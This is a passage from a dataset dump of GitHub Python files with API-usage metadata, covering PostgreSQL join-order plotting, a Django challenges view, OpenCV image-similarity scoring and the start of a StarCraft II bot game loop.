"resources.ingester.DB_ToGBL.DB_ToGBL", "line_number": 252, "usage_type": "call"}, {"api_name": "resources.ingester.DB_ToGBL", "line_number": 252, "usage_type": "name"}, {"api_name": "resources.ingester.Publish_ToGBL.Publish_ToGBL", "line_number": 258, "usage_type": "call"}, {"api_name": "resources.ingester.Publish_ToGBL", "line_number": 258, "usage_type": "name"}, {"api_name": "django.utils.translation.ngettext", "line_number": 264, "usage_type": "call"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 268, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 268, "usage_type": "name"}, {"api_name": "resources.ingester.Delete_From_Solr.Delete_From_Solr", "line_number": 273, "usage_type": "call"}, {"api_name": "resources.ingester.Delete_From_Solr", "line_number": 273, "usage_type": "name"}, {"api_name": "django.utils.translation.ngettext", "line_number": 281, "usage_type": "call"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 285, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 285, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 295, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 295, "usage_type": "name"}, {"api_name": "django.db.connection.cursor", "line_number": 302, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 302, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 309, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 311, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.WKTWriter", "line_number": 323, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.GEOSGeometry", "line_number": 325, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 340, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 352, "usage_type": "call"}, {"api_name": "pygments.formatters.HtmlFormatter", "line_number": 355, "usage_type": "call"}, {"api_name": "pygments.highlight", "line_number": 357, "usage_type": "call"}, {"api_name": "pygments.lexers.JsonLexer", "line_number": 357, "usage_type": "call"}, {"api_name": "models.Resource", "line_number": 363, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 365, "usage_type": "name"}, {"api_name": "models.End_Point", "line_number": 368, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 370, "usage_type": "name"}, {"api_name": "models.Publisher", "line_number": 373, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 375, "usage_type": "name"}, {"api_name": "models.Community_Input", "line_number": 378, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 380, "usage_type": "name"}, {"api_name": "models.Georeference_Request", "line_number": 382, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 385, "usage_type": "name"}, {"api_name": "models.Owner", "line_number": 390, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 392, "usage_type": "name"}, {"api_name": "models.Type", "line_number": 394, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 396, "usage_type": "name"}, {"api_name": "models.Geometry_Type", "line_number": 398, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 400, "usage_type": "name"}, {"api_name": "models.Format", "line_number": 402, "usage_type": "argument"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 405, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 405, "usage_type": "name"}, {"api_name": "models.Category_Keywords.category", "line_number": 406, "usage_type": "attribute"}, {"api_name": "models.Category_Keywords", "line_number": 406, "usage_type": "name"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 409, "usage_type": "name"}, {"api_name": "models.Category_Keywords", "line_number": 411, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 413, "usage_type": "name"}, {"api_name": "models.Category", "line_number": 417, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 420, "usage_type": "name"}, {"api_name": "models.Tag", "line_number": 422, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 424, "usage_type": "name"}, {"api_name": "models.Place", "line_number": 426, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 428, "usage_type": "name"}, {"api_name": "models.Named_Place", "line_number": 430, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 432, "usage_type": "name"}, {"api_name": "models.URL_Type", "line_number": 435, "usage_type": "argument"}, {"api_name": "django.contrib.gis.admin.OSMGeoAdmin", "line_number": 437, "usage_type": "name"}, {"api_name": "models.URL", "line_number": 440, "usage_type": "argument"}]} +{"seq_id": "42268205687", "text": "import numpy as np\nimport json\nimport pdb\nimport networkx as nx\nimport time\nimport matplotlib\n\nimport networkx as nx\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nimport grandalf\nfrom grandalf.layouts import SugiyamaLayout\n\nfrom .utils import SOURCE_NODE\nfrom evaluation.cost_model import update_subplan_costs\n\nCROSS_JOIN_CARD = 19329323\n\ndef _find_all_tables(plan):\n '''\n '''\n # find all the scan nodes under the current level, and return those\n table_names = extract_values(plan, \"Relation Name\")\n alias_names = extract_values(plan, \"Alias\")\n table_names.sort()\n alias_names.sort()\n\n return table_names, alias_names\n\ndef explain_to_nx(explain):\n '''\n '''\n base_table_nodes = []\n join_nodes = []\n\n def _get_node_name(tables):\n name = \"\"\n if len(tables) > 1:\n name = str(deterministic_hash(str(tables)))[0:5]\n join_nodes.append(name)\n else:\n name = tables[0]\n if len(name) >= 6:\n # no aliases, shorten it\n name = \"\".join([n[0] for n in name.split(\"_\")])\n if name in base_table_nodes:\n name = name + \"2\"\n base_table_nodes.append(name)\n return name\n\n def _add_node_stats(node, plan):\n # add stats for the join\n G.nodes[node][\"Plan Rows\"] = plan[\"Plan Rows\"]\n if \"Actual Rows\" in plan:\n G.nodes[node][\"Actual Rows\"] = plan[\"Actual Rows\"]\n else:\n G.nodes[node][\"Actual Rows\"] = -1.0\n\n if \"Node Type\" in plan:\n G.nodes[node][\"Node Type\"] = plan[\"Node Type\"]\n total_cost = plan[\"Total Cost\"]\n G.nodes[node][\"Total Cost\"] = total_cost\n aliases = G.nodes[node][\"aliases\"]\n if len(G.nodes[node][\"tables\"]) > 1:\n children_cost = plan[\"Plans\"][0][\"Total Cost\"] \\\n + plan[\"Plans\"][1][\"Total Cost\"]\n\n # +1 to avoid cases which are very close\n # if not total_cost+1 >= children_cost:\n # print(\"aliases: {} children cost: {}, total cost: {}\".format(\\\n # aliases, children_cost, total_cost))\n # pdb.set_trace()\n G.nodes[node][\"cur_cost\"] = total_cost - children_cost\n G.nodes[node][\"node_label\"] = plan[\"Node Type\"][0]\n G.nodes[node][\"scan_type\"] = \"\"\n else:\n # FIXME: debug\n G.nodes[node][\"cur_cost\"] = total_cost\n G.nodes[node][\"node_label\"] = node\n # what type of scan was this?\n node_types = extract_values(plan, \"Node Type\")\n for i, full_n in enumerate(node_types):\n shortn = \"\"\n for n in full_n.split(\" \"):\n shortn += n[0]\n node_types[i] = shortn\n\n scan_type = \"\\n\".join(node_types)\n G.nodes[node][\"scan_type\"] = scan_type\n\n def traverse(obj):\n if isinstance(obj, dict):\n if \"Plans\" in obj:\n if len(obj[\"Plans\"]) == 2:\n # these are all the joins\n left_tables, left_aliases = _find_all_tables(obj[\"Plans\"][0])\n right_tables, right_aliases = _find_all_tables(obj[\"Plans\"][1])\n if len(left_tables) == 0 or len(right_tables) == 0:\n return\n all_tables = left_tables + right_tables\n all_aliases = left_aliases + right_aliases\n all_aliases.sort()\n all_tables.sort()\n\n if len(left_aliases) > 0:\n node0 = _get_node_name(left_aliases)\n node1 = _get_node_name(right_aliases)\n node_new = _get_node_name(all_aliases)\n else:\n node0 = _get_node_name(left_tables)\n node1 = _get_node_name(right_tables)\n node_new = _get_node_name(all_tables)\n\n # update graph\n G.add_edge(node_new, node0)\n G.add_edge(node_new, node1)\n G.edges[(node_new, node0)][\"join_direction\"] = \"left\"\n G.edges[(node_new, node1)][\"join_direction\"] = \"right\"\n\n # add other parameters on the nodes\n G.nodes[node0][\"tables\"] = left_tables\n G.nodes[node1][\"tables\"] = right_tables\n G.nodes[node0][\"aliases\"] = left_aliases\n G.nodes[node1][\"aliases\"] = right_aliases\n G.nodes[node_new][\"tables\"] = all_tables\n G.nodes[node_new][\"aliases\"] = all_aliases\n\n # TODO: if either the left, or right were a scan, then add\n # scan stats\n _add_node_stats(node_new, obj)\n\n if len(left_tables) == 1:\n _add_node_stats(node0, obj[\"Plans\"][0])\n if len(right_tables) == 1:\n _add_node_stats(node1, obj[\"Plans\"][1])\n\n for k, v in obj.items():\n if isinstance(v, (dict, list)):\n traverse(v)\n\n elif isinstance(obj, list) or isinstance(obj,tuple):\n for item in obj:\n traverse(item)\n\n G = nx.DiGraph()\n traverse(explain)\n G.base_table_nodes = base_table_nodes\n G.join_nodes = join_nodes\n return G\n\nNODE_COLORS = {}\n# NODE_COLORS[\"Hash Join\"] = 'b'\n# NODE_COLORS[\"Merge Join\"] = 'r'\n# NODE_COLORS[\"Nested Loop\"] = 'c'\n\nNODE_COLORS[\"Index Scan\"] = 'k'\nNODE_COLORS[\"Seq Scan\"] = 'k'\nNODE_COLORS[\"Bitmap Heap Scan\"] = 'k'\n\nNODE_COLORS[\"Hash\"] = 'k'\nNODE_COLORS[\"Materialize\"] = 'k'\nNODE_COLORS[\"Sort\"] = 'k'\n\n# for signifying whether the join was a left join or right join\nEDGE_COLORS = {}\nEDGE_COLORS[\"left\"] = \"k\"\nEDGE_COLORS[\"right\"] = \"k\"\n\ndef _plot_join_order_graph(G, base_table_nodes, join_nodes, pdf, title,\n fn):\n\n def format_ints(num):\n # returns the number formatted to closest 1000 + K\n return str(round(num, -3)).replace(\"000\",\"\") + \"K\"\n\n def _plot_labels(xdiff, ydiff, key, font_color, font_size):\n labels = {}\n label_pos = {}\n for k, v in pos.items():\n label_pos[k] = (v[0]+xdiff, v[1]+ydiff)\n if key in G.nodes[k]:\n if is_float(G.nodes[k][key]):\n labels[k] = format_ints(G.nodes[k][key])\n else:\n labels[k] = G.nodes[k][key]\n else:\n est_labels[k] = -1\n\n nx.draw_networkx_labels(G, label_pos, labels,\n font_size=font_size, font_color=font_color, ax=ax)\n\n fig,ax = plt.subplots(figsize=(8,7))\n NODE_SIZE = 600\n\n # FUCK fucking graphviz\n # pos = graphviz_layout(G, prog='dot')\n # pos = graphviz_layout(G, prog='dot',\n # args='-Gnodesep=0.05')\n\n # graphviz is better, but its is a bitch to install, so grandalf is also ok otherwise\n # G = G.reverse(copy=True)\n\n g = grandalf.utils.convert_nextworkx_graph_to_grandalf(G) # undocumented function\n class defaultview(object):\n w, h = 10, 10\n for v in g.V(): v.view = defaultview()\n sug = SugiyamaLayout(g.C[0])\n sug.init_all() # roots=[V[0]])\n # sug.init_all(roots=[g.V[0]],inverted_edges=[g.V[4].e_to(g.V[0])])\n # This is a bit of a misnomer, as grandalf doesn't actually come with any\n # visualization methods. This method instead calculates positions\n sug.draw() # Extracts the positions\n pos = {v.data: (v.view.xy[0], v.view.xy[1]) for v in g.C[0].sV}\n\n # ugly hacks; want to draw the graph upside down than what grandalf gives\n # us (graphviz actually gave the correct layout...)\n ys = []\n levels = {}\n leveltoy = {}\n newlevels = {}\n for k,v in pos.items():\n ys.append(v[1])\n ys.sort()\n ys = np.unique(ys)\n level = 0\n for y in ys:\n levels[y] = level\n leveltoy[level] = y\n newlevels[y] = len(ys)-1-level\n level += 1\n pos2 = {}\n for k,v in pos.items():\n lv = newlevels[v[1]]\n newy = leveltoy[lv]\n pos2[k] = (v[0], newy)\n\n pos = pos2\n\n plt.title(title)\n color_intensity = [G.nodes[n][\"cur_cost\"] for n in G.nodes()]\n vmin = min(color_intensity)\n vmax = max(color_intensity)\n # cmap = 'viridis_r'\n cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"green\",\"yellow\",\"red\"])\n\n nx.draw_networkx_nodes(G, pos,\n node_size=NODE_SIZE,\n node_color = color_intensity,\n cmap = cmap,\n alpha=0.2,\n vmin=vmin, vmax=vmax,\n ax=ax)\n\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin = vmin,\n vmax=vmax))\n\n sm._A = []\n plt.colorbar(sm, alpha=0.2, fraction=0.1, pad=0.0,\n label=\"PostgreSQL Estimated Cost\")\n\n _plot_labels(0, -10, \"est_card\", \"b\", 8)\n _plot_labels(0, +10, \"true_card\", \"darkorange\", 8)\n _plot_labels(0, 0, \"node_label\", \"k\", 14)\n\n patch1 = mpatches.Patch(color='b', label='Estimated Cardinality')\n patch2 = mpatches.Patch(color='darkorange', label='True Cardinality')\n plt.legend(handles=[patch1,patch2])\n\n # TODO: shape of node based on scan types\n # _plot_labels(+25, +5, \"scan_type\", \"b\", 10)\n\n x_values, y_values = zip(*pos.values())\n x_max = max(x_values)\n x_min = min(x_values)\n x_margin = (x_max - x_min) * 0.10\n plt.xlim(x_min - x_margin, x_max + x_margin)\n\n edge_colors = []\n for edge in G.edges():\n edge_colors.append(EDGE_COLORS[G.edges[edge][\"join_direction\"]])\n\n nx.draw_networkx_edges(G, pos, width=1.0,\n alpha=1.0, arrows=False,\n edge_color=edge_colors, ax=ax)\n plt.tight_layout()\n\n if pdf is not None:\n pdf.savefig()\n elif fn is not None:\n plt.savefig(fn)\n else:\n plt.show()\n\n plt.close()\n\ndef plot_explain_join_order(explain, true_cardinalities,\n est_cardinalities, pdf, title, fn=None):\n '''\n @true_cardinalities: dict for this particular explain\n '''\n G = explain_to_nx(explain)\n for node in G.nodes():\n aliases = G.nodes[node][\"aliases\"]\n aliases.sort()\n card_key = \" \".join(aliases)\n if true_cardinalities is None:\n G.nodes[node][\"est_card\"] = G.nodes[node][\"Plan Rows\"]\n G.nodes[node][\"true_card\"] = G.nodes[node][\"Actual Rows\"]\n elif card_key in true_cardinalities:\n G.nodes[node][\"est_card\"] = est_cardinalities[card_key]\n G.nodes[node][\"true_card\"] = true_cardinalities[card_key]\n elif tuple(aliases) in true_cardinalities:\n G.nodes[node][\"est_card\"] = est_cardinalities[tuple(aliases)]\n G.nodes[node][\"true_card\"] = true_cardinalities[tuple(aliases)]\n else:\n # unknown, might be a cross-join?\n G.nodes[node][\"est_card\"] = CROSS_JOIN_CARD\n G.nodes[node][\"true_card\"] = CROSS_JOIN_CARD\n # pdb.set_trace()\n\n _plot_join_order_graph(G, G.base_table_nodes, G.join_nodes, pdf, title, fn)\n return G\n\ndef draw_plan_graph(subsetg, y, cost_model, ax=None,\n source_node=SOURCE_NODE, final_node=None, font_size=40,\n cbar_fontsize=24, cax=None, fig=None, width=None,\n edge_color=None,\n bold_opt_path=True, bold_path=None):\n\n for n in subsetg.nodes():\n joined = \" \\Join \".join(n)\n joined = \"$\" + joined + \"$\"\n subsetg.nodes()[n][\"label\"] = joined\n\n if y is not None and cost_model is not None:\n cost_key = \"tmp_cost\"\n subsetg = subsetg.reverse()\n tcost = update_subplan_costs(subsetg, cost_model,\n cost_key=cost_key, ests=y)\n\n # TODO: need to add the flow-loss computing module\n # flows, edges = get_flows(subsetg, cost_model+cost_key)\n # Flow-Loss specific widths\n # MIN: 2...6\n # MIN_WIDTH = 1.0\n # MAX_WIDTH = 30.0\n # NEW_RANGE = MAX_WIDTH - MIN_WIDTH\n # OLD_RANGE = max(flows) - min(flows)\n\n # edge_widths = {}\n # for i, x in enumerate(flows):\n # normx = (((x - min(flows))*NEW_RANGE) / OLD_RANGE) + MIN_WIDTH\n # edge_widths[edges[i]] = normx\n # widths = []\n # for edge in subsetg.edges():\n # key = tuple([edge[1], edge[0]])\n # widths.append(edge_widths[key])\n\n # reverse back\n subsetg = subsetg.reverse()\n widths = []\n for edge in subsetg.edges():\n key = tuple([edge[1], edge[0]])\n widths.append(1.0)\n\n edge_colors = []\n for edge in subsetg.edges(data=True):\n edge_colors.append(edge[2][cost_model+cost_key])\n\n vmin = min(edge_colors)\n vmax = max(edge_colors)\n\n # assert len(edge_colors) == len(flows)\n opt_labels_list = nx.shortest_path(subsetg, source_node,\n final_node, weight=cost_model+cost_key)\n opt_labels = {}\n for n in subsetg.nodes(data=True):\n if n[0] in opt_labels_list:\n opt_labels[n[0]] = n[1][\"label\"]\n\n cm = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\"green\", \"yellow\", \"red\"])\n\n else:\n widths = []\n for edge in subsetg.edges():\n key = tuple([edge[1], edge[0]])\n widths.append(2.0)\n cm = None\n\n pos = nx.nx_pydot.pydot_layout(subsetg, prog=\"dot\")\n\n if ax is None:\n fig, ax = plt.subplots(1,1,figsize=(30,20))\n\n labels = nx.get_node_attributes(subsetg, 'label')\n\n nx.draw_networkx_labels(subsetg, pos=pos,\n labels=labels,\n ax=ax, font_size=font_size,\n bbox=dict(facecolor=\"w\", edgecolor='k', boxstyle='round,pad=0.1'))\n\n if bold_opt_path and cost_model is not None:\n nx.draw_networkx_labels(subsetg, pos=pos,\n labels=opt_labels, ax=ax,\n font_size=font_size,\n bbox=dict(facecolor=\"w\", edgecolor='k',\n lw=font_size/2, boxstyle='round,pad=0.5', fill=True))\n\n if bold_path and cost_model is not None:\n bold_labels = {}\n for n in subsetg.nodes(data=True):\n if n[0] in bold_path:\n bold_labels[n[0]] = n[1][\"label\"]\n nx.draw_networkx_labels(subsetg, pos=pos,\n labels=bold_labels, ax=ax,\n font_size=font_size,\n bbox=dict(facecolor=\"w\", edgecolor='k',\n lw=font_size/2, boxstyle='round,pad=0.5', fill=True))\n\n if edge_color is not None:\n edge_colors = edge_color\n\n edges = nx.draw_networkx_edges(subsetg, pos,\n edge_color=edge_colors,\n width=widths, ax = ax, edge_cmap=cm,\n arrows=True,\n arrowsize=font_size / 2,\n arrowstyle='simple',\n min_target_margin=5.0)\n\n if y is not None and cost_model is not None:\n plt.style.use(\"seaborn-white\")\n sm = plt.cm.ScalarMappable(cmap=cm,\n norm=plt.Normalize(vmin=vmin, vmax=vmax))\n sm.set_array([])\n if fig is None:\n cbar = plt.colorbar(sm, aspect=50,\n orientation=\"horizontal\", pad =\n 0.02)\n else:\n cbar = fig.colorbar(sm, ax=ax,\n pad = 0.02,\n aspect=50,\n orientation=\"horizontal\")\n\n cbar.ax.tick_params(labelsize=font_size)\n cbar.set_label(\"Cost\", fontsize=font_size)\n cbar.ax.xaxis.get_offset_text().set_fontsize(font_size)\n\n plt.tight_layout()\n", "repo_name": "learnedsystems/CEB", "sub_path": "query_representation/viz.py", "file_name": "viz.py", "file_ext": "py", "file_size_in_byte": 15652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 51, "dataset": "github-code", "pt": "61", "api": [{"api_name": "networkx.DiGraph", "line_number": 148, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "grandalf.utils.convert_nextworkx_graph_to_grandalf", "line_number": 206, "usage_type": "call"}, {"api_name": "grandalf.utils", "line_number": 206, "usage_type": "attribute"}, {"api_name": "grandalf.layouts.SugiyamaLayout", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 242, "usage_type": "name"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap.from_list", "line_number": 247, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 247, "usage_type": "attribute"}, {"api_name": "networkx.draw_networkx_nodes", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm.ScalarMappable", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 257, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "networkx.draw_networkx_edges", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 297, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 297, "usage_type": "name"}, {"api_name": "utils.SOURCE_NODE", "line_number": 328, "usage_type": "name"}, {"api_name": "evaluation.cost_model.update_subplan_costs", "line_number": 341, "usage_type": "call"}, {"api_name": "networkx.shortest_path", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.colors.LinearSegmentedColormap.from_list", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 384, "usage_type": "attribute"}, {"api_name": "networkx.nx_pydot.pydot_layout", "line_number": 393, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 393, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 396, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 396, "usage_type": "name"}, {"api_name": "networkx.get_node_attributes", "line_number": 398, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 400, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 406, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_labels", "line_number": 417, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_edges", "line_number": 426, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 435, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 435, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 435, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.ScalarMappable", "line_number": 436, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 436, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 436, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 437, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 437, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 440, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 453, "usage_type": "name"}]} +{"seq_id": "36805208294", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom challenges.models import CommunityChallenge\n\ndef challenges(request):\n num_challenge_posts = CommunityChallenge.objects.all().count()\n posts = CommunityChallenge.objects.order_by('-published_date')\n\n context = {\n 'num_challenge_posts': num_challenge_posts,\n 'challenges': posts,\n }\n\n\n return render(request, 'challenges.html', context=context)", "repo_name": "katiehrenchir/you-go-girl", "sub_path": "challenges/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "challenges.models.CommunityChallenge.objects.all", "line_number": 6, "usage_type": "call"}, {"api_name": "challenges.models.CommunityChallenge.objects", "line_number": 6, "usage_type": "attribute"}, {"api_name": "challenges.models.CommunityChallenge", "line_number": 6, "usage_type": "name"}, {"api_name": "challenges.models.CommunityChallenge.objects.order_by", "line_number": 7, "usage_type": "call"}, {"api_name": "challenges.models.CommunityChallenge.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "challenges.models.CommunityChallenge", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "34093717952", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"These functions calculate the similarity of two images of the same size.\"\"\"\n\n\nimport cv2\nfrom .utils import img_mat_rgb_2_gray\n\n\ndef cal_ccoeff_confidence(im_source, im_search):\n \"\"\"求取两张图片的可信度,使用TM_CCOEFF_NORMED方法.\"\"\"\n # 扩展置信度计算区域\n im_search = cv2.copyMakeBorder(im_search, 10,10,10,10,cv2.BORDER_REPLICATE)\n \n im_source, im_search = img_mat_rgb_2_gray(im_source), img_mat_rgb_2_gray(im_search)\n res = cv2.matchTemplate(im_source, im_search, cv2.TM_CCOEFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n return max_val\n\n\ndef cal_rgb_confidence(img_src_rgb, img_sch_rgb):\n \"\"\"同大小彩图计算相似度.\"\"\"\n # 扩展置信度计算区域\n img_sch_rgb = cv2.copyMakeBorder(img_sch_rgb, 10,10,10,10,cv2.BORDER_REPLICATE)\n # 转HSV强化颜色的影响\n img_src_rgb = cv2.cvtColor(img_src_rgb, cv2.COLOR_BGR2HSV)\n img_sch_rgb = cv2.cvtColor(img_sch_rgb, cv2.COLOR_BGR2HSV)\n src_bgr, sch_bgr = cv2.split(img_src_rgb), cv2.split(img_sch_rgb)\n\n # 计算BGR三通道的confidence,存入bgr_confidence:\n bgr_confidence = [0, 0, 0]\n # 加入取值范围干扰,防止算法过于放大微小差异\n src_bgr[0][0,0] = sch_bgr[0][0,0] = 0\n src_bgr[0][0,1] = sch_bgr[0][0,1] = 255\n for i in range(3):\n res_temp = cv2.matchTemplate(src_bgr[i], sch_bgr[i], cv2.TM_CCOEFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res_temp)\n bgr_confidence[i] = max_val\n\n return min(bgr_confidence)\n", "repo_name": "manito-666/air_uitest", "sub_path": "lib/python3.9/site-packages/airtest/aircv/cal_confidence.py", "file_name": "cal_confidence.py", "file_ext": "py", "file_size_in_byte": 1595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.copyMakeBorder", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "utils.img_mat_rgb_2_gray", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.matchTemplate", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.minMaxLoc", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.copyMakeBorder", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.matchTemplate", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.TM_CCOEFF_NORMED", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.minMaxLoc", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "36448126999", "text": "import asyncio\nimport logging\nimport time\nimport six\nimport json\nimport os\nimport mpyq\nimport async_timeout\nfrom s2clientprotocol import sc2api_pb2 as sc_pb\n\nfrom .client import Client\nfrom .data import CreateGameError, Result\nfrom .game_state import GameState\nfrom .player import Bot, Human\nfrom .portconfig import Portconfig\nfrom .protocol import ConnectionAlreadyClosed, ProtocolError\nfrom .sc2process import SC2Process\n\nlogger = logging.getLogger(__name__)\n\n\nclass SlidingTimeWindow:\n def __init__(self, size: int):\n assert size > 0\n\n self.window_size = size\n self.window = []\n\n def push(self, value: float):\n self.window = (self.window + [value])[-self.window_size :]\n\n def clear(self):\n self.window = []\n\n @property\n def sum(self) -> float:\n return sum(self.window)\n\n @property\n def available(self) -> float:\n return sum(self.window[1:])\n\n @property\n def available_fmt(self) -> float:\n return \",\".join(f\"{w:.2f}\" for w in self.window[1:])\n\n\nasync def _play_game_human(client, player_id, realtime, game_time_limit):\n while True:\n state = await client.observation()\n if client._game_result:\n return client._game_result[player_id]\n\n if game_time_limit and (state.observation.observation.game_loop * 0.725 * (1 / 16)) > game_time_limit:\n print(state.observation.game_loop, 